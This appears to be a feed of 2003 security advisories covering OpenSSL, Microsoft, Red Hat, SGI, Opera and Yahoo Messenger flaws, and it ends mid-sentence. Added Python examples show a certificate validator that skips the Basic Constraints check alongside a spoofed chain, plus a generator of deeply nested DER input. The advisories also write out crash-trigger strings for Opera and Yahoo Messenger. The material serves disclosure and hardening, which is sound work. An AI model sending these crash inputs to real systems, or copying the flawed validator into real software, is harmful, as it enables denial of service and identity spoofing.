SGI has released Patch 10032: SGI Advanced Linux Environment security
update #5, which includes updated RPMs for SGI ProPack v2.2.1 and SGI
ProPack v2.3 for the Altix family of systems.

Overview

This update has been released in response to the
following errata released by Red Hat:

 Updated XFree86 packages provide security and bug fixes
 https://rhn.redhat.com/errata/RHSA-2003-289.html

 Updated zebra packages fix security vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-305.html

 Updated fileutils packages fix ls vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-310.html

 Updated PostgreSQL packages fix buffer overflow
 https://rhn.redhat.com/errata/RHSA-2003-314.html

 Updated iproute packages fix local security vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-317.html

 Updated Ethereal packages fix security issues
 https://rhn.redhat.com/errata/RHSA-2003-324.html


Patches

Patch 10032 is available from http://support.sgi.com/
or the individual RPMs from Patch 10032 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.2.1/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.2.1/updates/SRPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS




Certificate Validation Flaw Could Enable Identity Spoofing (Revised MS02-050)

2003-11-13

Risk level: Important

Type: flaw

Source of info: Microsoft Security Team

Impact

The vulnerability identified in the original version of the bulletin 
could enable an attacker who had a valid end-entity certificate to 
issue a subordinate certificate that, although bogus, would 
nevertheless pass validation. Because CryptoAPI is used by a wide 
range of applications, this could enable a variety of identity 
spoofing attacks. 
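A validator that checks signatures and name chaining but never looks at Basic Constraints behaves exactly as described above: any end-entity key can sign a "subordinate" certificate and the path still verifies. The block below is an added example, not Microsoft's CryptoAPI code. It models certificates as records whose signatures are represented by key identifiers (a certificate is "signed" by whoever owns sig_key_id; real code verifies the signature bytes with the issuer's public key) and contrasts the two validators on a constructed chain. All subject names and key identifiers are invented.

```python
"""Chain validation with and without the Basic Constraints check. The first
validator only checks that names link up and that each signature verifies, so the
holder of any end-entity certificate can mint a 'subordinate' certificate that
passes. The second refuses to let a certificate issue anything unless it asserts
cA=TRUE, carries keyCertSign, and is within its pathLenConstraint."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


@dataclass
class Cert:
    subject: str
    issuer: str
    key_id: str                       # identifies this certificate's public key
    sig_key_id: str                   # key that produced the signature on this certificate
    is_ca: bool = False               # BasicConstraints cA
    path_len: Optional[int] = None    # BasicConstraints pathLenConstraint
    key_usage: Set[str] = field(default_factory=set)


def _links_and_signatures_ok(chain: List[Cert], trust_anchors: Dict[str, str]) -> bool:
    """chain runs leaf first; trust_anchors maps a root subject to its key_id."""
    if not chain:
        return False
    for child, parent in zip(chain, chain[1:]):
        if child.issuer != parent.subject or child.sig_key_id != parent.key_id:
            return False
    root = chain[-1]
    return trust_anchors.get(root.subject) == root.key_id and root.sig_key_id == root.key_id


def validate_signatures_only(chain, trust_anchors) -> bool:
    """Vulnerable validator: what a path check that ignores Basic Constraints reduces to."""
    return _links_and_signatures_ok(chain, trust_anchors)


def validate_chain(chain, trust_anchors) -> bool:
    """Hardened validator: every issuer in the path must be entitled to issue."""
    if not _links_and_signatures_ok(chain, trust_anchors):
        return False
    for i in range(1, len(chain)):
        issuer = chain[i]
        if not issuer.is_ca or "keyCertSign" not in issuer.key_usage:
            return False
        intermediates_below = i - 1   # CA certificates between this one and the leaf
        if issuer.path_len is not None and intermediates_below > issuer.path_len:
            return False
    return True


# Constructed sample PKI: a root, one intermediate limited to issuing leaves, a web
# server certificate, and a bogus certificate that the web server's key signed.
ROOT = Cert("Example Root CA", "Example Root CA", "k-root", "k-root", True, None, {"keyCertSign"})
INTERMEDIATE = Cert("Example Issuing CA", "Example Root CA", "k-int", "k-root", True, 0, {"keyCertSign"})
SERVER = Cert("www.example.com", "Example Issuing CA", "k-srv", "k-int", False, None, {"digitalSignature"})
FORGED = Cert("www.bank.example", "www.example.com", "k-forged", "k-srv", False, None, {"digitalSignature"})
TRUST_ANCHORS = {"Example Root CA": "k-root"}
LEGIT_CHAIN = [SERVER, INTERMEDIATE, ROOT]
SPOOFED_CHAIN = [FORGED, SERVER, INTERMEDIATE, ROOT]
```

Both validators accept LEGIT_CHAIN. SPOOFED_CHAIN is accepted by validate_signatures_only, because every signature in it is genuine, and rejected by validate_chain at the first issuer that is not a CA; the intermediate's pathLenConstraint of 0 would reject it as well even if the server certificate had claimed cA=TRUE.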

Overview

Microsoft re-issued this security bulletin on November 11, 2003 to 
advise on the availability of an updated Microsoft Windows 2000
Service Pack 4 (SP4) security patch. This revised security patch 
corrects a regression that may occur during the installation of 
Microsoft Internet Explorer 6.0 Service Pack 1 on Windows 2000 SP4. 
This regression removes the update that is discussed in this bulletin
and that is provided as part of Windows 2000 SP4. Customers who are 
using Windows 2000 SP4 and then installed Internet Explorer 6.0 
Service Pack 1 should apply the updated Windows 2000 SP4 security 
patch to help protect from this vulnerability.


Mitigating Factors:
*   The user could always manually check a certificate chain, and 
might notice in the case of a spoofed chain that there was an 
unfamiliar intermediate CA. 
*   Unless the attacker's digital certificates were issued by a CA 
in the user's trust list, the certificate would generate a 
warning when validated. 
*   The attacker could only spoof certificates of the same type as 
the one he or she possessed. In the case where the attacker 
attempted an attack using a high-value certificate such as 
Authenticode certificates, this would necessitate obtaining a 
legitimate certificate of the same type - which could require 
the attacker to prove his or her identity or entitlement to the 
issuing CA. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS02-050.asp 



Vulnerabilities in Microsoft Word and Microsoft Excel

2003-11-12

Risk level: high

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Vulnerabilities in Microsoft Word and Microsoft Excel could allow
arbitrary code to run.

Overview

Included in this advisory is an update describing newly discovered
vulnerabilities in Microsoft Office (Microsoft Word and Excel).

Affected Software: 
  - Microsoft Excel 97 
  - Microsoft Excel 2000 
  - Microsoft Excel 2002 
  - Microsoft Word 97 
  - Microsoft Word 98(J) 
  - Microsoft Word 2000, Microsoft Works Suite 2001
  - Microsoft Word 2002, Microsoft Works Suite 2002,
    Microsoft Works Suite 2003 and Microsoft Works Suite 2004




Denial of Service in OpenSSL 0.9.6k (ASN.1 parsing) under MS Windows

2003-11-04

Risk level: medium

Type: DoS

Source of info: openssl.org

Impact

Previously, OpenSSL 0.9.6k was released on 30 September 2003 to
address various ASN.1 issues.  The issues were found using a test
suite from NISCC (www.niscc.gov.uk) and fixed by Dr Stephen Henson
(steve@openssl.org) of the OpenSSL core team.

Subsequent to that release, Novell Inc. carried out further testing
using the NISCC suite.  They discovered that there was a denial of
service vulnerability in OpenSSL version 0.9.6k when running on a
Windows platform.

Overview

A bug in OpenSSL 0.9.6 would cause certain ASN.1 sequences to trigger
a large recursion.  On platforms such as Windows this large recursion
cannot be handled correctly and so the bug causes OpenSSL to crash.  A
remote attacker could exploit this flaw if they can send arbitrary
ASN.1 sequences which would cause OpenSSL to crash.  This could be
performed for example by sending a client certificate to a SSL/TLS
enabled server which is configured to accept them.

We do not believe this issue could be exploited further than a Denial
of Service attack.  
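The recursion in the ASN.1 parser is what the crash exploits: one stack frame per nested SEQUENCE until the stack is exhausted. The block below is an added example rather than OpenSSL code: a small DER walker with an explicit depth limit, exercised on constructed inputs. The MAX_DEPTH of 32 is an assumption; real parsers size the limit to their stack budget, and X.509 structures need far less.

```python
"""A DER walker with an explicit nesting limit. Without it, each nested SEQUENCE
costs one recursive call, and a few thousand of them exhaust a small thread stack.
With it, deep nesting is an ordinary parse error long before the stack is at risk."""
MAX_DEPTH = 32                 # assumed limit for the example


class DERError(ValueError):
    pass


def _read_tlv(buf, off):
    """Read one tag-length-value at off; return (tag, value, next_off)."""
    if off >= len(buf):
        raise DERError("truncated tag")
    tag = buf[off]
    off += 1
    if tag & 0x1F == 0x1F:
        raise DERError("high tag number form not handled here")
    if off >= len(buf):
        raise DERError("truncated length")
    first = buf[off]
    off += 1
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4 or off + n > len(buf):
            raise DERError("indefinite or oversized length")
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
        if length < 0x80 or (n > 1 and length < 1 << (8 * (n - 1))):
            raise DERError("non-minimal length encoding")    # DER forbids it
    if off + length > len(buf):
        raise DERError("length runs past end of buffer")
    return tag, buf[off:off + length], off + length


def parse_der(buf, max_depth=MAX_DEPTH):
    """Return a list of (tag, children_or_bytes) for the elements in buf."""
    def walk(data, depth):
        if depth > max_depth:
            raise DERError("nesting depth %d exceeds limit %d" % (depth, max_depth))
        items, off = [], 0
        while off < len(data):
            tag, value, off = _read_tlv(data, off)
            if tag & 0x20:                          # constructed: recurse into contents
                items.append((tag, walk(value, depth + 1)))
            else:
                items.append((tag, value))
        return items
    return walk(buf, 0)


def parses_within_limit(buf, max_depth=MAX_DEPTH):
    """True if buf is well-formed DER no deeper than max_depth."""
    try:
        parse_der(buf, max_depth)
        return True
    except DERError:
        return False


def _der_length(n):
    if n < 0x80:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw


def nested_sequences(n):
    """Constructed input: n SEQUENCEs nested around a single INTEGER 1."""
    body = b"\x02\x01\x01"
    for _ in range(n):
        body = b"\x30" + _der_length(len(body)) + body
    return body
```

In Python an unbounded walk would end in RecursionError rather than a process crash; in C there is no such safety net, which is why the limit has to be explicit. The length checks matter for the same reason: a length that runs past the buffer or a non-minimal encoding is rejected before any recursion happens.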

Patches for this issue have been created by Dr Stephen Henson
(steve@openssl.org) of the OpenSSL core team.


OpenSSL 0.9.6k is affected by the bug, but the denial of service does
not affect all platforms.  This issue does not affect OpenSSL 0.9.7.
Currently only OpenSSL running on Windows platforms is known to crash.

Upgrade to OpenSSL 0.9.6l or 0.9.7c.  Recompile any OpenSSL applications statically linked to OpenSSL libraries.

Patches

http://www.openssl.org/source/
ftp://ftp.openssl.org/source/
FTP mirrors you can find here:
http://www.openssl.org/source/mirror.html




Updated fileutils/coreutils packages fix ls vulnerabilities

2003-11-03

Risk level: high

Type: DoS

Source of info: Red Hat Security Team

Impact

Updated fileutils and coreutils packages that close a potential denial of service vulnerability are now available.

Overview

The fileutils package contains several basic system utilities. One of
these utilities is the "ls" program, which is used to list information
about files and directories. In Red Hat Linux 9, the ls program is part of
the coreutils package.

Georgi Guninski discovered a memory starvation denial of service
vulnerability in the ls program.  It is possible to make ls allocate a
huge amount of memory by specifying certain command line arguments.  This
vulnerability is remotely exploitable through services like wu-ftpd, which
pass user arguments to ls.  The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0854 to this issue.

A non-exploitable integer overflow in ls has also been discovered.  It is
possible to make ls crash by specifying certain command line arguments. 
This vulnerability is remotely exploitable through services like wu-ftpd,
which pass user arguments to ls.  The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0853 to this issue.

This erratum contains new fileutils packages for Red Hat Linux versions
7.1, 7.2, 7.3, and 8.0.  It also contains new coreutils packages for Red
Hat Linux 9.  These packages contain backported patches correcting these
vulnerabilities.

The Red Hat Linux 7.2 and 7.3 packages also add support for the
O_DIRECT flag, which controls the use of synchronous I/O on file systems
such as OCFS.

Patches

Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/fileutils-4.0.36-4.3.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/fileutils-4.0.36-4.3.i386.rpm

Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/fileutils-4.1-10.4.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/fileutils-4.1-10.4.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/fileutils-4.1-10.4.ia64.rpm

Red Hat Linux 7.3:
SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/fileutils-4.1-10.4.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/fileutils-4.1-10.4.i386.rpm

Red Hat Linux 8.0:
SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/fileutils-4.1.9-11.2.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/fileutils-4.1.9-11.2.i386.rpm

Red Hat Linux 9:
SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/coreutils-4.5.3-19.0.2.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/coreutils-4.5.3-19.0.2.i386.rpm



Microsoft Windows Security Bulletin Summary for October 2003

2003-10-30

Risk level: high

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Subsequent to the release of the Windows Security Bulletin Summary for October, the following bulletins have undergone a major revision
increment:
- MS03-042
- MS03-043
- MS03-045

Overview

 MS03-042 - Buffer Overflow in the Windows Troubleshooter ActiveX Control Could Allow Code Execution (826232)

Affected Software:
 - Windows 2000, Service Pack 2
 - Windows 2000, Service Pack 3, Service Pack 4 
Version Number: V2.0

Reason for Major Revision, V2.0 October 29, 2003:
=================================================
     Microsoft re-issued this bulletin on October 29, 2003 to advise on the availability of an updated Windows 2000 patch.

     This revised patch corrects the Debug Programs (SeDebugPrivilege) user right issue that some customers experienced with the original patch that is discussed in Knowledge Base Article 830846.

     This problem is unrelated to the security vulnerability discussed in this bulletin. Customers who have already applied the patch are protected against the vulnerability discussed in this bulletin.


 MS03-043 - Buffer Overrun in Messenger Service Could Allow Code Execution (828035)

Affected Software:
    - Windows NT Workstation 4.0, Service Pack 6a
    - Windows NT Server 4.0, Service Pack 6a
    - Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
    - Windows 2000, Service Pack 2
    - Windows 2000, Service Pack 3, Service Pack 4
    - Windows XP Gold, Service Pack 1
    - Windows XP 64-bit Edition
    - Windows XP 64-bit Edition Version 2003
    - Windows Server 2003
    - Windows Server 2003 64-bit Edition 

Impact: Remote Code Execution
Version Number: 2.0
     
Reason for Major Revision, V2.0 October 29, 2003:
=================================================
     Microsoft re-issued this bulletin on October 29, 2003 to advise on the availability of an updated Windows 2000, Windows XP, and Windows Server 2003 patch.

     This revised patch corrects the Debug Programs (SeDebugPrivilege) user right issue that some customers experienced with the original patch that is discussed in Knowledge Base Article 830846.

     This problem is unrelated to the security vulnerability discussed in this bulletin. Customers who have already applied the patch are protected against the vulnerability discussed in this bulletin.


 MS03-045 - Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (824141)

Affected Software:
    - Windows NT Workstation 4.0, Service Pack 6a
    - Windows NT Server 4.0, Service Pack 6a
    - Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
    - Windows 2000, Service Pack 2
    - Windows 2000, Service Pack 3, Service Pack 4
    - Windows XP Gold, Service Pack 1
    - Windows XP 64-bit Edition
    - Windows XP 64-bit Edition Version 2003
    - Windows Server 2003
    - Windows Server 2003 64-bit Edition 

Impact: Remote Code Execution
Version Number: 3.0

Reason for Major Revision, V3.0 October 29, 2003:
=================================================
     Microsoft re-issued this bulletin on October 29, 2003 to advise on the availability of an updated Windows XP patch. 

     This revised patch corrects the Debug Programs (SeDebugPrivilege) user right issue that some customers experienced with the original patch that is discussed in Knowledge Base Article 830846.

     This problem is unrelated to the security vulnerability discussed in this bulletin. Customers who have already applied the patch are protected against the vulnerability discussed in this bulletin.

Patches

http://www.microsoft.com/technet/security/bulletin/winoct03.asp 



Several updates for SGI

2003-10-27

Risk level: high

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI Advanced Linux Environment security updates have been released: Patch 10026 (security update #2), Patch 10027 (security update #3) and Patch 10031 (security update #2). They include updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems.

Overview

Patch 10026 includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems, in response to the following errata released by Red Hat:

 Updated OpenSSH packages fix potential vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-280.html

 Updated Sendmail packages fix vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-284.html

Patch 10027 includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems, in response to the following errata released by Red Hat:

 Updated MySQL packages fix vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-282.html

 Updated SANE packages fix remote vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-285.html

 Updated OpenSSL packages fix vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-293.html

 Updated Apache and mod_ssl packages fix security vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-244.html

 Updated Perl packages fix security issues
 https://rhn.redhat.com/errata/RHSA-2003-257.html

 Updated KDE packages fix security issues
 https://rhn.redhat.com/errata/RHSA-2003-270.html

 Updated pine packages fix vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2003-274.html

 Updated pam_smb packages fix remote buffer overflow
 https://rhn.redhat.com/errata/RHSA-2003-262.html

 Updated OpenLDAP packages fix various vulnerabilities
 https://rhn.redhat.com/errata/RHSA-2002-312.html

 Updated GDM packages fix minor security issues
 https://rhn.redhat.com/errata/RHSA-2003-259.html

 Updated WindowMaker packages fix vulnerability in theme-loading
 https://rhn.redhat.com/errata/RHSA-2003-009.html

 Updated ghostscript packages fix vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-182.html

 Updated zlib packages fix gzprintf buffer overflow vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-081.html

Patch 10031 includes updated RPMs for SGI ProPack v2.2.1 and SGI ProPack v2.3 for the Altix family of systems, in response to the following erratum released by Red Hat:

 Updated Mozilla packages fix security vulnerability
 https://rhn.redhat.com/errata/RHSA-2003-163.html

Patches

Patches are available from 
http://support.sgi.com/



Buffer Overflow in Yahoo messenger Client

2003-10-26

Risk level: medium

Type: Buffer overflow

Source of info: Hat-Squad Security Team

Impact

Vulnerability in Yahoo Messenger File Transfer option allows a remote attacker to shut down the victim client.

Overview

The Yahoo Messenger service filters some special characters in the YahooID field, such as x, & and ?. When an attacker initiates a file send request to victimID%%%%%%%%% (a string of more than 73 characters), the service strips the % characters and prompts "victimID" about an incoming file transfer session. If the victim accepts the incoming file, the client shuts down with an access violation. The access violation occurs in FT.DLL, which is responsible for peer-to-peer Yahoo Messenger file transfers.




Revised Microsoft summary bulletins for October 2003

2003-10-23

Risk level: Important

Type: many types

Source of info: Microsoft Security Team

Impact

Subsequent to the release of the Windows Security Bulletin Summary for October and the Microsoft Exchange Security Bulletin Summary for October, the following bulletins have undergone a major revision
increment: MS03-045 and MS03-047.

Overview

Included in this advisory are updates for five newly discovered 
vulnerabilities in Microsoft Windows and for two in Microsoft Exchange Server. These vulnerabilities, 
broken down by product and severity, are: 

1)For Windows:
** Critical Security Bulletins
MS03-041 - Vulnerability in Authenticode Could Allow Remote Code Execution (823182)
Affected Software: 
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition
Impact: Remote Code Execution
Version Number: 1.1 

MS03-042 - Buffer Overflow in the Windows Troubleshooter ActiveX Control Could Allow Code Execution (826232)
Affected Software:
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4 
Impact: Remote Code Execution
Version Number: 1.1

MS03-043 - Buffer Overrun in Messenger Service Could Allow Code Execution (828035)
Affected Software:
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition,  
 Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition 
Impact: Remote Code Execution
Version Number: 1.1

MS03-044 - Buffer Overflow in Windows Help and Support Center Could lead to System Compromise (825119)
Affected Software:
- Windows Millennium Edition
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition,  
 Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition 
Impact: Remote Code Execution
Version Number: 1.1

** Important Security Bulletins
MS03-045 - Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (824141)
Affected Software:
- Windows NT Workstation 4.0, Service Pack 6a
- Windows NT Server 4.0, Service Pack 6a
- Windows NT Server 4.0, Terminal Server Edition,  
 Service Pack 6
- Windows 2000, Service Pack 2
- Windows 2000, Service Pack 3, Service Pack 4
- Windows XP Gold, Service Pack 1
- Windows XP 64-bit Edition
- Windows XP 64-bit Edition Version 2003
- Windows Server 2003
- Windows Server 2003 64-bit Edition 
Impact: Remote Code Execution
Version Number: 2.0
     Reason for Major Revision, V2.0 October 22, 2003:
     =================================================
     Subsequent to the release of this bulletin and the associated 
     patches, a compatibility problem with some third party 
     software has been identified with a set of language specific 
     versions of the Windows 2000 Service Pack 4 patch. This problem
     is unrelated to the security vulnerability discussed in this 
     bulletin. Customers who have applied the patch are protected 
     against the vulnerability discussed in this bulletin.

     Microsoft has developed a fix for this issue and is 
     re-releasing this bulletin to reflect the new updated patches.  
     The compatibility problems only affect the language versions 
     of the patch listed within the bulletin and only those versions
     of the patch are being re-released. Other language versions of 
     this patch are not affected and are not being re-released. 
     Please note that the new security patches support both the 
     Setup switches originally documented in this bulletin as well 
     as a set of new Setup switches that are document in the 
     Installation Information Section of this bulletin. 
     Additionally, the updated language versions support Windows 
     2000 Service Pack 2, Windows 2000 Service Pack 3, and 
     Windows 2000 Service Pack 4 in a single security patch. 

2) For Microsoft Exchange Server, broken down by severity: 

** Critical Security Bulletins

MS03-046 - Vulnerability in Exchange Server could allow Arbitrary Code Execution (829436)
Affected Software: 
- Exchange Server 5.5
- Exchange 2000 Server
Impact: Remote Code Execution
Version Number: 1.1 

** Moderate Security Bulletins 

MS03-047 - Vulnerability in Exchange Server 5.5 Outlook Web Access Could Allow Cross-Site Scripting Attack (828489)
Affected Software:
Exchange Server 5.5
Impact: Remote Code Execution 
Version Number: 2.0
     Reason for Major Revision, V2.0 October 22, 2003:
     =================================================
     Subsequent to the original release of this bulletin, it was
     discovered that certain languages were not covered by the
     original patch. This bulletin has been updated to provide 
     information about a new patch, which is intended for customers
     having installed a language from the Language Packs for
     Outlook Web Access. In addition, for this patch to function 
     properly the Outlook Web Access (OWA) server on which the 
     patch is installed must have Internet Explorer 5.01 or greater
     installed. If the patch is installed on a system with a version
     of IE less than 5.01, unexpected consequences may result.
     The "Caveats" section has been updated to include version
     requirements for this patch. It also contains version
     recommendations for dependent components that are applicable at
     the time of this writing. The deployment section has also been 
     expanded to discuss in detail how to download and install this
     security patch.
 

Patches

http://www.microsoft.com/technet/security/bulletin/excoct03.asp 
http://www.microsoft.com/technet/security/bulletin/winoct03.asp 



Opera HREF escaped server name overflow

2003-10-20

Risk level: high

Type: Buffer overflow

Source of info: @stake, Inc.

Impact

The Opera browser exhibits a failure when rendering HTML. Certain
HREFs cause a buffer allocated on the heap to overflow. Arbitrary
bytes in the heap may be overwritten. This can result in the
compromise of systems running Opera. Opera's mail system seems to be
vulnerable also and recovery from reading an email is somewhat
difficult. 

Overview

An attacker can send an email containing HTML to a user running the
Opera mail client and cause this overflow to occur when the HTML is
rendered. An owner of a web site can craft a malicious web page
containing the problematic HTML to cause an overflow on Opera
clients visiting the site.


Details:

Rendering HREFs with certain illegally escaped server names in the
URL will cause Opera to crash due to a buffer management problem.
Sometimes the crash is observed immediately, sometimes when the
browser is closed, presumably as the resources are being freed.

The escaped URLs are of the form:

<a href="file://server%%[many % characters]%%text" ></a>

Patches

Upgrade to the version 7.21:
http://www.opera.com/download/



Mod_security 1.7 for Apache has been released

2003-10-19

Risk level: none

Type: none

Source of info: mod_security.org

Impact

Mod_security is an Apache module whose purpose is to protect
vulnerable applications and reject human or automated attacks.
It is an open source intrusion detection and prevention system
for Apache. In addition to request filtering, it also creates Web
application audit logs. Requests are filtered using regular
expressions. Some of the things possible are:

 * Apply filters against any part of the request (URI,
   headers, either GET or POST)
 * Apply filters against individual parameters
 * Reject SQL injection attacks
 * Reject Cross site scripting attacks

With few general rules mod_security can protect from both
known and unknown vulnerabilities.

Overview

Changes (v1.7)
--------------

 * Output filtering has been added to Apache 2.x.

 * The ability to filter cookies directly has been added.

 * Apache can now pretend to be some other Web server through
   the SecServerSignature directive.

 * Three new actions: "allow" to finish filter processing and let
   the request through, "chain" to chain several filter together
   (logical AND), and "skipnext" to skip over filters.

 * A new anti-evasion technique to fight null-byte attacks.

 * Finally, the module now runs on Netware.



Ircd remote denial of service vulnerability

2003-10-19

Risk level: medium

Type: Remote DoS

Source of info: OpenPKG

Impact

 According to a report from Piotr Kucharski, a buffer overflow vulnerability exists in ircd that allows a remote attacker to crash the ircd server, thus causing a denial of service condition.

Overview

 The Common Vulnerabilities and Exposures (CVE) project assigned the id
  CAN-2003-0864 [2] to the problem.

  Please check whether you are affected by running "<prefix>/bin/rpm -q
  ircd". If you have the "ircd" package installed and its version is
  affected (see above), we recommend that you immediately upgrade it
  (see Solution). [3][4]

Solution:
  Select the updated source RPM appropriate for your OpenPKG release,
  fetch it from the OpenPKG FTP service (ftp://ftp.openpkg.org/release/1.2/UPD/
  or ftp://ftp.openpkg.org/release/1.3/UPD/) or a mirror location, verify
  its integrity, build a corresponding binary RPM from it and update your
  OpenPKG installation by applying the binary RPM. For the current release
  OpenPKG 1.3, perform the following operations to permanently fix the
  security problem (for other releases adjust accordingly).

Patches

ftp://ftp.openpkg.org/release/1.3/UPD/ircd-2.10.3p3-1.3.1.src.rpm



Windows and Exchange Server Security Bulletins Summary for October 2003

2003-10-17

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Included in this advisory are updates for seven newly discovered 
vulnerabilities in Microsoft Windows and Microsoft Exchange Server.

Overview

These vulnerabilities, broken down by severity, are:
\\Critical Security Bulletins\\

    MS03-041 - Vulnerability in Authenticode Could Allow Remote Code Execution (823182)
      - Affected Software: 
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition

      - Impact: Remote Code Execution
      - Version Number: 1.0 

    MS03-042 - Buffer Overflow in the Windows Troubleshooter ActiveX Control Could Allow Code Execution (826232)

      - Affected Software:
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4 

      - Impact: Remote Code Execution
      - Version Number: 1.0

    MS03-043 - Buffer Overrun in Messenger Service Could Allow Code Execution (828035)

      - Affected Software:
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition,  
                 Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition 

      - Impact: Remote Code Execution
      - Version Number: 1.0

    MS03-044 - Buffer Overflow in Windows Help and Support Center Could lead to System Compromise (825119)
      - Affected Software:
      - Windows Millennium Edition
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition,Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3, Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition 

      - Impact: Remote Code Execution
      - Version Number: 1.0
 
    MS03-046 - Vulnerability in Exchange Server could allow Arbitrary Code Execution (829436)
      - Affected Software: 
      - Exchange Server 5.5
      - Exchange 2000 Server

      - Impact: Remote Code Execution
      - Version Number: 1.0 

\\Important Security Bulletins\\

    MS03-045 - Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (824141)

      - Affected Software:
      - Windows NT Workstation 4.0, Service Pack 6a
      - Windows NT Server 4.0, Service Pack 6a
      - Windows NT Server 4.0, Terminal Server Edition,  Service Pack 6
      - Windows 2000, Service Pack 2
      - Windows 2000, Service Pack 3,Service Pack 4
      - Windows XP Gold, Service Pack 1
      - Windows XP 64-bit Edition
      - Windows XP 64-bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-bit Edition 

      - Impact: Remote Code Execution
      - Version Number: 1.0


\\Moderate Security Bulletins\\
    MS03-047 - Vulnerability in Exchange Server 5.5 Outlook Web Access Could Allow Cross-Site Scripting Attack (828489)
      - Affected Software:
      - Exchange Server 5.5

      - Impact: Remote Code Execution 
      - Version Number: 1.0

Patches

Patches are available to fix these vulnerabilities.
For additional information, including Technical Details, 
Workarounds, answers to Frequently Asked Questions, and Patch 
Deployment Information please read the Microsoft Exchange 
Security Bulletin Summary for October at:
http://www.microsoft.com/technet/security/excoct03.asp 

and

the Microsoft Windows 
Security Bulletin Summary for October at:
